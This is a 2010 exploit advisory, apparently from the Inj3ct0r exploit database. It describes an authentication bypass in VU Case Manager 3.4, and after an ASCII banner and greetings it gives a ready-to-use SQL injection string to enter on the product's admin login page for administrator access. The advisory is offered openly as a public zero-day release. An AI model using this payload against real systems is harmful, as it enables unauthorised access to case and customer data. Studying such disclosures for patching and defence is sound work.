1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \__/'__`\/\ \__/'__`\ 0 0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1 1\/_/\ \ /' _ `\ \/\ \/_/_\_<_/'___\ \ \/\ \ \ \ \/\`'__\0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1 1\ \____/ >> Exploit database separated by exploit 0 0 \/___/type (local, remote, DoS, etc.)1 11 0[+] Site: Inj3ct0r.com0 1[+] Support e-mail: submit[at]inj3ct0r.com1 00 1########################################### 1 0I'm L0rd CrusAd3r member from Inj3ct0r Team 1 1########################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com] Exploit Title:VU Case Manager Authentication Bypass Code: ASP 3.0 & VBScript Vendor url:http://www.vunet.us Version:3.4 Price:80$ Published: 2010-06-12 Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to all ICW members. Spl Greetz to:inj3ct0r.com Team ##################################################################################################################################################################################################### Description: Case Management (Open, Assign, Resolve); Inventory Management (Store and Manage Your Items); Knowledgebase (View Resolved Cases); Reports (Create Reports, Statistics, Billing); 3 Access Levels; Email Notifications; Check Case Status ####################################################################################################################################################################################################### Vulnerability: *Authentication Bypass found The Provided Script as Sqli Vulnerability in Admin Login page DEMO URL: http://[site]/[path]/management.asp Use the string a' or '1'='1 for Username and Password to gain access. # 0day n0 m0re # # L0rd CrusAd3r #
体验盒子
